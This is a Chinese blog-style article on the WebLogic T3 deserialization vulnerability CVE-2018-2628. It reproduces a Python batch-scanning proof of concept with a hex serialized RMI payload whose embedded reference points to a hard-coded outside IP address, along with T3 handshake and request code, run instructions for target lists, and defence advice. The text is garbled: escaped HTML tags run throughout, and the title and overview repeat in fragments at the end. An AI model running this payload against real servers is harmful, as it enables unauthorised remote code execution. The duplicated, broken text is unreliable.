WebLogic反序列化漏洞CVE-2018-2628检测与利用详解<\/h1>

漏洞概述<\/h2>
CVE-2018-2628是Oracle WebLogic Server中的一个严重反序列化漏洞，影响WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3版本。该漏洞存在于T3协议中，攻击者可以通过构造恶意的T3请求，在目标服务器上执行任意代码。<\/p>

漏洞原理<\/h2>

T3协议<\/strong>：WebLogic使用T3协议进行通信，该协议在传输过程中会对Java对象进行序列化和反序列化<\/li>
反序列化漏洞<\/strong>：WebLogic在反序列化恶意构造的Java对象时，未进行充分的安全检查<\/li>

RMI机制<\/strong>：漏洞利用Java远程方法调用(RMI)机制，通过反序列化执行远程代码<\/li> <\/ol>
检测脚本分析<\/h2>
脚本功能<\/h3>

批量检测WebLogic服务器是否存在CVE-2018-2628漏洞<\/li>
支持从文件读取目标IP列表<\/li>
将检测结果输出到指定文件<\/li> <\/ul>
关键组件<\/h3>

Payload构造<\/strong>：<\/li> <\/ol>
PAYLOAD =<\/span> ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'<\/span>] <\/span><\/span><\/code><\/pre> T3握手过程<\/strong>：<\/li> <\/ol> def<\/span> t3handshake<\/span>(sock, server_addr): <\/span><\/span> sock.<\/span>connect(server_addr) <\/span><\/span> sock.<\/span>send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'<\/span>.<\/span>decode('hex'<\/span>)) <\/span><\/span> time.<\/span>sleep(1<\/span>) <\/span><\/span> sock.<\/span>recv(1024<\/span>) <\/span><\/span><\/code><\/pre> T3请求对象构建<\/strong>：<\/li> <\/ol> def<\/span> buildT3RequestObject<\/span>(sock, port, server_addr): <\/span><\/span> # 构造并发送T3请求数据包<\/span> <\/span><\/span> data1 =<\/span> '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'<\/span> <\/span><\/span> data2 =<\/span> '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000<\/span>{0}<\/span>ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'<\/span>.<\/span>format('<\/span>{:04x}<\/span>'<\/span>.<\/span>format(dport)) <\/span><\/span> data3 =<\/span> '1a7727000d3234322e323134'<\/span> <\/span><\/span> data4 =<\/span> '2e312e32353461863d1d0000000078'<\/span> <\/span><\/span><\/code><\/pre> 漏洞验证<\/strong>：<\/li> <\/ol> def<\/span> checkVul<\/span>(res, server_addr, index): <\/span><\/span> p =<\/span> re.<\/span>findall(VER_SIG[index], res, re.<\/span>S) <\/span><\/span> if<\/span> len(p) ><\/span> 0<\/span>: <\/span><\/span> info =<\/span> '<\/span>%s<\/span> : <\/span>%d<\/span> 存在 <\/span>%s<\/span> 漏洞.'<\/span> %<\/span> (server_addr[0<\/span>], server_addr[1<\/span>], VUL[index]) <\/span><\/span> fp.<\/span>write(info +<\/span> "<\/span>\n<\/span>"<\/span>) <\/span><\/span> fp.<\/span>flush() <\/span><\/span><\/code><\/pre>使用说明<\/h2> 准备工作<\/h3> 创建weblogic1.txt<\/code>文件，格式为IP:PORT<\/code>，每行一个目标<\/li> 确保Python环境支持所需模块<\/li> <\/ol> 执行命令<\/h3> python weblogic_poc-cve-2018-2628.py <\/span><\/span><\/code><\/pre>输出结果<\/h3> 检测结果会保存在weblogic1_success.txt<\/code>中<\/li> 控制台会显示实时检测进度<\/li> <\/ul> 防御措施<\/h2> 官方补丁<\/strong>：应用Oracle官方发布的安全补丁<\/li> 网络限制<\/strong>：限制T3协议的外部访问<\/li> 使用防火墙规则限制只允许可信IP访问WebLogic端口<\/li> <\/ul> <\/li> 临时解决方案<\/strong>：禁用T3协议<\/li> 设置WebLogic的weblogic.management.discover<\/code>属性为false<\/li> <\/ul> <\/li> <\/ol> 注意事项<\/h2> 该脚本仅用于安全检测目的，未经授权扫描他人系统可能违法<\/li> 批量扫描时建议控制频率，避免对目标系统造成过大负担<\/li> 检测过程中可能出现误报或漏报，建议结合其他工具验证<\/li> <\/ol> 技术细节<\/h2> T3协议特征<\/strong>：<\/p> 使用十六进制格式通信<\/li> 包含版本号、协议类型等信息<\/li> <\/ul> <\/li> 漏洞利用关键点<\/strong>：<\/p> 通过构造特定的序列化对象触发漏洞<\/li> 利用RMI机制实现远程代码执行<\/li> <\/ul> <\/li> 检测原理<\/strong>：<\/p> 发送特定payload后检查返回内容是否包含特定特征<\/li> 通过正则匹配$Proxy[0-9]+<\/code>模式判断漏洞是否存在<\/li> <\/ul> <\/li> <\/ol> 扩展知识<\/h2> 反序列化漏洞防御<\/strong>：<\/p> 使用白名单机制限制可反序列化的类<\/li> 实现ObjectInputFilter<\/code>接口进行过滤<\/li> <\/ul> <\/li> WebLogic安全加固<\/strong>：<\/p> 定期更新补丁<\/li> 最小化开放端口<\/li> 启用安全审计日志<\/li> <\/ul> <\/li> 相关漏洞<\/strong>：<\/p> CVE-2017-3248<\/li> CVE-2017-10271<\/li> CVE-2019-2725<\/li> <\/ul> <\/li> <\/ol>

WebLogic反序列化漏洞CVE-2018-2628检测与利用详解<\/h1>

漏洞概述<\/h2> CVE-2018-2628是Oracle WebLogic Server中的一个严重反序列化漏洞，影响WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3版本。该漏洞存在于T3协议中，攻击者可以通过构造恶意的T3请求，在目标服务器上执行任意代码。<\/p>

检测脚本分析<\/h2>

使用说明<\/h2>

漏洞概述<\/h2>
CVE-2018-2628是Oracle WebLogic Server中的一个严重反序列化漏洞，影响WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3版本。该漏洞存在于T3协议中，攻击者可以通过构造恶意的T3请求，在目标服务器上执行任意代码。<\/p>